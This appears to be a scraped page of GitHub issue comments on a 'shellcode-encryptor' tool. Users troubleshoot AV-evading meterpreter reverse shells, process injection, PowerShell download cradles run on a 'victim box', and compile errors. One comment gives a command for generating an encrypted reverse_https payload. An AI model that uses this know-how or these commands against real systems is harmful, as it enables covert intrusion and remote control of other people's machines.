plackyhacker / shellcode-encryptor Goto Github PK

Hi. I used your code repo to generate the b64 payload and key strings and compiled the ProcessInjection.cs template using VS2019. The executable works fine with AV turned off and gets a meterpreter sesssion. When I try executing via the PS script (with AV off) I can see the .exe file being pulled down but no connection on metasploit.

1). Payload generated

2). PS commands ran on victim box

3). SimpleHTTP server showing the file being pulled down

I have also tried using IEX cradle to load the powershell script test.ps1 as shown in image 3 which behaves the same, i.e. file gets pulled down but no execution.

Hi, was trying this, but getting an error upon execution:

SharpCall.exe
[+] Base Address of ntdll is 0x774E0000
[+] Target PID is 408
[+] Syscall NtOpenProcess on 408

Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at System.Runtime.InteropServices.Marshal.CopyToManaged(IntPtr source, Object destination, Int32 startIndex, Int32 length)
at System.Runtime.InteropServices.Marshal.Copy(IntPtr source, Byte[] destination, Int32 startIndex, Int32 length)
at SysCall.Syscalls.GetSysCallId(String FunctionName)
at SysCall.Syscalls.NtOpenProcess(IntPtr& ProcessHandle, UInt32 AccessMask, OBJECT_ATTRIBUTES& ObjectAttributes, CLIENT_ID& ClientId)
at SysCall.Program.Main(String[] args)

I changed the two vars to run the compiler then, I get errors in various flavors. Any chance you could provide instruction on how to compile it?

Error: System.AccessViolationException: 'Attempted to read or write protected memory. This is often an indication that other memory is corrupt.'

Unhandled exception on function();.

Hi, so I followed your directions and everything works perfect when I use the same 64 bit payload you used, but I'm not having any luck with 32 bit payloads.

I'm using ./shellcode_encryptor.py -p windows/meterpreter/reverse_https -i myip -l myport -f b64
then compile in VS build release x86
then use windows/meterpreter/reverse_https multi handler

and nothing happens when I try to launch the executable.

Hi there, I tried .NET Framework v3.5 - v4.0, using csc.exe to compile the ProcessInjection.cs, and get error like this:

And whether you miss a "}" at the last of the code?
Please check this, thanks a lot.